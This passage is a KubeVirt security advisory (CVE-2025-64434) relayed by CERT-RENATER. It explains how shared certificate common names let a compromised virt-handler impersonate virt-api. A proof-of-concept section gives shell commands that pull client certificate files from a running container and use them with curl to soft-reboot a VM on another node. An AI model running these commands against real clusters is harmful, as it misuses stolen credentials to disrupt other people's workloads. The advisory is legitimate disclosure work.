  //...
	rawPeer, rawIntermediates := rawCerts[0], rawCerts[1:]
	c, err := x509.ParseCertificate(rawPeer)
	//...
	fullCommonName := fmt.Sprintf("kubevirt.io:system:%s:virt-handler", commonName)
	if !externallyManaged && c.Subject.CommonName != fullCommonName {
		return fmt.Errorf("common name is invalid, expected %s, but got %s", fullCommonName, c.Subject.CommonName)
	}
	//...

The above code illustrates that client certificates accepted be
KubeVirt should have as CN kubevirt.io:system:client:virt-handler
which is the same as the CN present in the virt-api's certificate.
However, the latter is not the only component in the KubeVirt stack
which can communicate with a virt-handler instance.

In addition to the extension API server, any other virt-handler
can communicate with it. This happens in the context of VM migration
operations. When a VM is migrated from one node to another, the
virt-handlers on both nodes are going to use structures called
ProxyManager to communicate back and forth on the state of the
migration.

//pkg/virt-handler/migration-proxy/migration-proxy.go

func NewMigrationProxyManager(serverTLSConfig *tls.Config, clientTLSConfig *tls.Config, config *virtconfig.ClusterConfig) ProxyManager {
	return &migrationProxyManager{
		sourceProxies:   make(map[string][]*migrationProxy),
		targetProxies:   make(map[string][]*migrationProxy),
		serverTLSConfig: serverTLSConfig,
		clientTLSConfig: clientTLSConfig,
		config:          config,
	}
}

This communication follows a classical client-server model, where the
virt-handler on the migration source node acts as a client and the
virt-handler on the migration destination node acts as a server. This
communication is also secured using mTLS. The server certificate
presented by the virt-handler acting as a migration destination node
is the same as the one which is used for the communication between
the same virt-handler and the virt-api in the context of VM lifecycle
operations (CN=kubevirt.io:system:node:virt-handler). However, the
client certificate which is used by a virt-handler instance has the
same CN as the client certificate used by virt-api.

admin@minikube:~$ openssl x509 -text -in $(CID=$(docker ps --filter 'Name=virt-handler' --format '{{.ID}}' | head -n 1) && docker inspect $CID | grep "clientcertificates:ro" | cut -d ":" -f1 | tr -d '"[:space:]')/tls.crt | grep -e "Subject:" -e "Issuer:" -e "Serial"

Serial Number: 2951695854686290384 (0x28f687bdb791c1d0)
Issuer: CN = kubevirt.io@1747579138
Subject: CN = kubevirt.io:system:client:virt-handler

Although the migration procedure, where two separate virt-handler
instances coordinate the transfer of a VM's state, is not directly
tied to the communication between virt-api and virt-handler
during VM lifecycle management, there is a critical overlap in
the TLS authentication mechanism. Specifically, the client
certificate used by both virt-handler and virt-api shares the
same CN field, despite the use of different, randomly allocated
ports, for the two types of communication.


PoC

Complete instructions, including specific configuration details,
to reproduce the vulnerability.

To illustrate the vulnerability, a Minikube cluster has been
deployed with two nodes (minikube and minikube-m02) thus, with
two virt-handler instances alongside a vmi running on one of
the nodes. It is considered that an attacker has obtained access
to the client certificate bundle used by the virt-handler
instance running on the compromised node (minikube) while the
virtual machine is running on the other node (minikube-m02).
Thus, they can interact with the sub-resource API exposed by
the other virt-handler instance and control the lifecycle of
the VMs running on the other node:

# the deployed VMI on the non-compromised node minikube-m02
apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  labels:
  kubevirt.io/size: small
  name: mishandling-common-name-in-certificate-handler
spec:
  domain:
    devices:
      disks:
      - name: containerdisk
        disk:
          bus: virtio

      - name: cloudinitdisk
        disk:
          bus: virtio
    resources:
      requests:
        memory: 1024M
  terminationGracePeriodSeconds: 0
  volumes:
  - name: containerdisk
    containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo
  - name: cloudinitdisk      
    cloudInitNoCloud:
      userDataBase64: SGkuXG4=

# the IP of the non-compromised handler running on the node minikube-m02 is 10.244.1.3
attacker@minikube:~$ curl -k https://10.244.1.3:8186/
curl: (56) OpenSSL SSL_read: error:0A00045C:SSL routines::tlsv13 alert certificate required, errno 0
# get the certificate bundle directory and redo the request
attacker@minikube:~$ export CERT_DIR=$(docker inspect $(docker ps --filter 'Name=virt-handler' --format='{{.ID}}' | head -n 1) | grep "clientcertificates:ro" | cut -d ':' -f1 | tr -d '"[:space:]')

attacker@minikube:~$ curl -k  --cert ${CERT_DIR}/tls.crt --key ${CERT_DIR}/tls.key  https://10.244.1.3:8186/
404: Page Not Found

# soft reboot the VMI instance running on the other node
attacker@minikube:~$ curl -ki  --cert ${CERT_DIR}/tls.crt --key ${CERT_DIR}/tls.key  https://10.244.1.3:8186/v1/namespaces/default/virtualmachineinstances/mishandling-common-name-in-certificate-handler/softreboot  -XPUT
HTTP/1.1 202 Accepted
# the VMI mishandling-common-name-in-certificate-handler has been rebooted


Impact

What kind of vulnerability is it? Who is impacted?

Due to the peer verification logic in virt-handler (via
verifyPeerCert), an attacker who compromises a virt-handler
instance, could exploit these shared credentials to impersonate
virt-api and execute privileged operations against other
virt-handler instances potentially compromising the integrity
and availability of the managed by it VM.


Severity
Moderate
4.7/ 10

CVSS v3 base metrics
Attack vector
Local
Attack complexity
High
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE ID
CVE-2025-64434

Weaknesses
Weakness CWE-287


Credits

    @mihailkirov mihailkirov Finder
    @Faeris95 Faeris95 Finder



=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================




